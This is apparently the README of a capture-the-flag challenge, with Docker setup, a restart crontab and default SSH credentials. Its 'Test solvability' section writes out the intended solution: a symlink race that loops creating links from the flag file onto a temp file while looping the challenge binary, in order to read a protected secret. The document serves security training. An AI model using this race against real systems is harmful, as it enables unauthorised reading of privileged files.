# Fast And Secure

> That's over Inspector, you're d00med! There is nothing you can do on our servers, of course you can enumerate some processes and all, but you'll never be fast enough to retrieve our secrets!

Please also note that this docker will restart every 30mn to guarantee a "sane state", so *don't store your work in /tmp ou /dev/shm* as they'll be cleaned often. You shouldn't need to do that anyway! :)


# Setup

```bash
make && docker-compose up --build
# In crontab
*/30 * * * * root bash -c 'cd /fast-and-secure; docker-compose stop; docker-compose rm -f;docker-compose up'
```


# Test solvability

```bash
RHOST=127.0.0.1
ssh "chall@$RHOST" # pass:chall
# On shell 1
while true; do ln -sf /home/chall/flag $(find /tmp/chall -name "processes-*"); done
# On shell 2
while true; do /home/chall/chall; done
```
